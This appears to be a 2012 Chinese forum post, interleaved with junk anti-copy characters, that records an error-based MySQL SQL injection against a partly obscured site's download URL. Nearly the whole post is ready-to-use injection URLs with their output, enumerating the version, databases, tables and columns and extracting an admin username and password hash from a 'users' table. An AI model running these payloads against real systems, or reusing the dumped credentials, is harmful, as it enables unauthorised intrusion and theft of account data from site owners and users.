http://www.wooyun.org/bugs/wooyun-2010-01666
6 d8 s( b. F# [1 S5 K L
D# a* f9 I, _9 m/ n$ b: H之前想找个测试 没想到这有 可以测试下做个记录而已 " n2 E0 n- Y( B4 k, C( b! c4 q; M
/ `8 R8 X" u# ?) e$ t: h: @6 W# F$ T
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
4 q _$ g. h' f6 [8 E6 {5 Q3 N- Q- x0 m9 Z0 p I1 F8 O- u4 B& r8 }
/data0/htdocs/leqi_new/app/myapp.php
) U+ k0 }' `; h6 ]& m* B2 E7 Z/ H0 Q! Q; m9 W- g# @- o
或者
) [1 w/ C# l6 y, g! _ R. i+ k$ i% C
' q3 o+ U7 I/ X& y- I6 z- k3 J/**********version()**********/ 5.1.49-log: `/ |- g6 y: }4 x$ I2 x+ ]9 A
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- y1 h, \" `* r" ?7 B0 N% ^3 }. O
; `- l3 s `- _2 \! y; Z9 f5 \/**********user()**********/
. k9 a( d) e6 r+ B7 G# Q( b& khttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0037 E7 I; N1 y% `( p1 ~+ J- P# z
" V0 {& [+ e @$ _/**********database()**********/ leqi
0 P% i) D7 B) C% M% v$ u8 shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 H, l# W+ J& P5 l9 o6 p
" J6 c0 e+ a4 Q1 c. T+ a/**********limit依次递归爆库**********/( W; I! p5 L2 Z/ k- ?" S' ~1 O' }: S
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0030 j* @3 @/ ]9 v; G8 Z
information_schema
2 u' \6 H: @7 `: K% Phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: Y; C7 v3 Y2 ]0 j5 hleqi( X2 Q- y0 o4 g: S3 t- s
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ v# v+ W( O2 C l8 ]! G" A5 R4 r) ~test
1 a! T) c6 a/ m4 A5 `& {- _* m
/**********limit依次递归爆表名**********/
$ V9 Q2 g7 r( y8 Ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! H* O1 a2 k$ `9 X9 e# W1 E
users9 t- c# Z+ s% k% h' z
1 ]+ Q( H1 [& _& Z% j+ _8 O
/**********limit依次递归爆字段名**********/
4 p$ G: z& k2 |4 bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) f+ L1 {; {7 U
user_id,username,nickname,passwd,group_id
& |& p4 T; L, @' \9 thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23. A+ E9 r+ J9 F7 l
/wapc/5000_0005_003
- X# ]3 v% p2 \! A11 211 P' t. o1 J* [1 T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
$ n& B# b2 J! E. w, s, j/wapc/5000_0005_003
7 |) y- Y: d" r) C/ s! G11 341 351 361
( d( Z( V. q& r4 h. e1 u6 e! n& G/**********爆数据**********/9 E x K! p" t8 F* B y% D
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/ ~& |7 k( V1 L/ `
admin
. q0 f4 m1 h, h5 Rhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%237 i# s, a( {8 [) Z( b0 T! e8 N+ o: d6 q
6a8b4574ca231eb8bd52764d4978ffcd
8 @& L# j# N7 @$ A, x: ]' `9 [' d' I( g; {
0 P3 H% {" r: u2 I' R2 I) M$ F
2 ^% i" I: i: ?0 e0 U |
发表于 2012-9-13 17:52:09
收藏
支持
反对